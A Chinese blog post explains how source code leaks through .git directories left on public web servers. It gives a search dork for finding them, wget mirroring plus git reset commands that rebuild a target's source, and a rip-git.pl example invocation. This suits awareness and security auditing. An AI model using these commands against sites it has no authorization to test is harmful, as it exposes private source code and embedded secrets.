通过.git获取源码

本来是看到这个文章，觉得还不错，想简单翻译一下搬到博客上来。结果晚上就发现一篇更详细的ppt。

原 ppt 链接 http://www.slideshare.net/kost/ripping-web-accessible-git-files

中文翻译基于 http://zone.wooyun.org/content/18004，有修改~

在运行git init初始化代码库的时候
会在当前目录下产生.git目录，用来记录代码的变更等等

.git目录结构如下

sky@linux:~/git-repo/test$ tree .git 
.git 
├── branches 
├── config 
├── description 
├── HEAD 
├── hooks 
│   ├── applypatch-msg.sample 
│   ├── commit-msg.sample 
│   ├── post-update.sample 
│   ├── pre-applypatch.sample 
│   ├── pre-commit.sample 
│   ├── prepare-commit-msg.sample 
│   ├── pre-push.sample 
│   ├── pre-rebase.sample 
│   └── update.sample 
├── info 
│   └── exclude 
├── objects 
│   ├── info 
│   └── pack 
└── refs 
    ├── heads 
    └── tags 

9 directories, 13 files 

发布代码的之后，直接把开发目录拷贝过去（.git）也在里面，然后就中奖了。。。

google一下：".git" intitle:"index of"

人肉获取法：

mkdir git-test 
cd git-test 
#下载.git文件 
wget --mirror --include-directories=/.git http://www.target.com/.git 
cd www.target.com 
#版本回退，得到了源代码 
git reset --hard 

如果apache是Options FollowSymLinks，.git访问是403，上面这种人肉法就失效了。。。

需要借助工具，来遍历关键文件并下载恢复：
https://github.com/kost/dvcs-ripper

rip-git.pl 

Example: ./rip-git.pl -v -u http://www.example.com/.git/ 

实例：
WooYun: 友盟网git服务使用不当导致源代码泄露
被忽视的开发安全问题
HCTF writeup(web)
One git command may cause you hacked(CVE-2014-9390)

git教程（写的真心详细）
http://www.liaoxuefeng.com/wiki/0013739516305929606dd18361248578c67b8067c8c017b000

FROM :strcpy.me | Author:strcpy